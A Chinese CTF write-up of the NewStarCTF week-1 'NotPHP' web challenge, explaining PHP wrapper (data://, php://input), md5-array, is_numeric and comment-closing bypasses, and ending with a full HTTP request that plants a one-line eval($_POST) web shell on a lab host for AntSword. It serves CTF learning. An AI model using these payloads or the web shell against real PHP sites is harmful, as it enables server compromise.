【ctf】newstar week1 web&misc

简介: 本次浅浅的介绍一下ctf中的web与misc,有兴趣的小伙伴可以学习一下哦

CTF(Capture The Flag)是一种信息安全竞赛的形式,通常会包含多种题目类型,如web和misc。

web类型的题目通常涉及到网站安全,包括常见的web漏洞,如跨站脚本攻击(XSS)、跨站请求伪造(CSRF)、SQL注入等。解决这类题目需要熟悉web安全技术,如HTTP协议、HTML、JavaScript、Cookie等。

misc类型的题目是一个比较杂的类别,包含了许多不同类型的题目,如编码、加密、数据处理、网络协议等。解决这类题目需要广泛的知识背景和技术技巧,需要解决者具备较强的分析和推理能力。

以下是web - not php
所有视频在https://www.bilibili.com/video/BV1F24y1R7rN/

NewstarCTF WEB NOTPHP WP

php伪协议

file_get_contents()函数

使用php://input伪协议绕过 ① 将要GET的参数?xxx=php://input ② 用post方法传入想要file_get_contents()函数返回的值 用data://伪协议绕过 将url改为:?xxx=data://text/plain;base64,想要file_get_contents()函数返回的值的base64编码 或者将url改为:?xxx=data:text/plain,(url编码的内容)

 

==判断值是否相等,比如 ‘1’ == 1是相等的。

= 赋值,比如 a = $q。

= 全等,比较类型和值,比如 1= 1是相等的,这样是不等的 ‘1’ === 1。

/?data=data://text/plain;base64,V2VsY29tZSB0byBDVEY=

 

md5强类型比较绕过

(md5($_GET['key1']) === md5($_GET['key2'])

$_GET['key1'] !== $_GET['key2'])

//&key1[]&key2[]=s155964671a

法1:如果两个字符经MD5加密后的值为 0exxxxx形式,就会被认为是科学计数法,且表示的是0*10的xxxx次方,还是零,都是相等的

法2:md5()函数无法处理数组,如果传入的为数组,会返回NULL,所以两个数组经过加密后得到的都是NULL,也就是相等的。

 

数字比较

!is_numeric($_POST['num']) && intval($_POST['num']) == 2077

!is_numeric(不是数字)

可以用%0a(换行符)绕过

 

eval+#绕过

eval()函数

#很烦需要闭合绕过

;?><?php%20eval($_POST[1]);?>

然后蚁剑连接,拿到flag

 

POST /?data=data://text/plain;base64,V2VsY29tZSB0byBDVEY=&key1[]&key2[]=s155964671a&cmd=;?><?php%20eval($_POST[1]);?> HTTP/1.1Host: 745d705e-7e34-4151-aaea-29b967d97d69.node4.buuoj.cn:81Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 11num=2077a

目录
相关文章
|
Java PHP
记录一道ctf web题
记录一道ctf web题
|
4月前
|
PHP 数据安全/隐私保护
*CTF 2023 web jwt2struts 题解wp
*CTF 2023 web jwt2struts 题解wp
37 4
|
7月前
|
SQL XML 安全
BugKu CTF(Web):sqli-0x1 & baby lfi & baby lfi 2
BugKu CTF(Web):sqli-0x1 & baby lfi & baby lfi 2
|
JavaScript 前端开发
Bugku CTF web 你必须让他停下来 解题思路
Bugku CTF web 你必须让他停下来 解题思路
115 2
|
7月前
|
域名解析 Linux PHP
[CTF]ctfshow web入门
[CTF]ctfshow web入门
|
7月前
|
SQL 前端开发 Java
《CTF攻防世界web题》之茶壶我爱你(2)
《CTF攻防世界web题》之茶壶我爱你(2)
60 0
|
7月前
|
前端开发 Java 计算机视觉
《CTF攻防世界web题》之我什么都不会(1)
《CTF攻防世界web题》之我什么都不会(1)
65 0
|
SQL 安全 PHP
SNERT预备队招新CTF体验赛-Web(SWCTF)
SNERT预备队招新CTF体验赛-Web(SWCTF)
85 0
|
SQL 安全 网络安全
CTF夺旗赛(WEB)-Guess Next Session
CTF夺旗赛(WEB)-Guess Next Session
Bugku CTF web GET 解题思路
Bugku CTF web GET 解题思路
111 0